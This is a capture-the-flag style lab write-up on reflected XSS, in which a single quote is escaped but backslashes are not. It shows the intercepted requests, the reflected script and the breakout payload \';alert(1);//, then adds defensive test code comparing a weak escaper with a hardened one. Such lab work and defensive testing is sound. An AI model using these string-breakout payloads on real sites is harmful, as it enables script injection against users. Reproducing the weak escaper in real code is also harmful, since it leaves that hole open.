Reflected XSS into a JavaScript string with angle brackets and double quotes HTML encoded and single quotes escaped

Description

This lab contains a reflected cross-site scripting vulnerability in the search query tracking functionality, where angle brackets and double quotes are HTML encoded and single quotes are escaped.

To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the alert function.

Approach

After accessing the lab, I intercepted the /search request and sent it to Burp Suite Repeater:

GET /?search=ichyaboy HTTP/2
Host: 0aa7005203f4f06384107c3e0063006d.web-security-academy.net
Cookie: session=owoPdZ7o4Bb1QTmhpOTgAGI6AmW17yYN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
...

I noticed that single quotes in my input were being escaped with a backslash (\).

When I sent:

GET /?search='ichyaboy

I got:

<script>
	var searchTerms = '\'ichyaboy';
	document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>

To neutralize this escaping backslash, I needed to add a backslash of my own in front of it. The payload therefore became:

GET /?search=\'ichyaboy

Then I got:

<script>
	var searchTerms = '\\'ichyaboy';
	document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>

Building the final payload:

GET /?search=\';alert(1);//

Let's break down this payload:

  • \ : This backslash escapes the backslash that the application inserts before my single quote. With the application's escaping backslash neutralized, the single quote is free to close the searchTerms string.

  • '; : This closes the searchTerms string in the script tag, allowing me to inject new JavaScript code.

  • alert(1); : This is the injected JavaScript code that will execute an alert box with the message "1".

  • // : This comments out the remainder of the JavaScript code to prevent any syntax errors from the original script.

By sending this payload, I successfully triggered an alert box, confirming the XSS vulnerability and solving the lab.
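The root cause is an escaper that handles the single quote but not the backslash. The following is an added example, not code from the lab or from this writeup: it models that weak escaper beside a hardened one and checks each the way a unit test for an escaper should, by rendering the literal, evaluating it with alert() stubbed, and confirming the original value comes back unchanged. The function names and the test inputs are my own.

```javascript
// Added example, not the lab's or the writeup's own code. It models the
// defect the lab contains (escaping ' but not \) next to a hardened
// escaper, and checks each one the way a unit test for an escaper should:
// render the literal, evaluate it, and confirm the original value comes back.

// Weak escaper, as the lab behaves: only the single quote is escaped, so a
// user-supplied backslash neutralises the escaping backslash.
function escapeWeak(input) {
  return input.replace(/'/g, "\\'");
}

// Hardened escaper: JSON.stringify escapes backslashes, double quotes and
// control characters; the extra replacements stop "</script>" and the
// JS line terminators U+2028/U+2029 from ending the literal or the script.
function escapeHardened(input) {
  return JSON.stringify(input)
    .replace(/<\//g, "<\\/")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderWeak(term) {
  return "var searchTerms = '" + escapeWeak(term) + "';";
}

function renderHardened(term) {
  return "var searchTerms = " + escapeHardened(term) + ";";
}

// Evaluate the rendered statement with alert() stubbed. Reports whether the
// value round-trips to the original input, whether any injected call to
// alert() ran, and any syntax error the rendered statement produced.
function checkEscaping(render, input) {
  let alerted = false;
  const outcome = { roundTrips: false, alerted: false, error: null };
  try {
    const fn = new Function("alert", render(input) + "\nreturn searchTerms;");
    const value = fn(() => { alerted = true; });
    outcome.roundTrips = value === input;
  } catch (e) {
    outcome.error = e.name;
  }
  outcome.alerted = alerted;
  return outcome;
}

// Constructed inputs: the lab payload from the writeup and an ordinary term.
const LAB_PAYLOAD = "\\';alert(1);//";
const BENIGN = "o'reilly";
```

Running checkEscaping(renderWeak, LAB_PAYLOAD) reports that the stub alert() ran and the value did not round-trip, while renderHardened yields no call and an exact round-trip; both escapers pass for BENIGN, which is why this defect is easy to miss with ordinary test data.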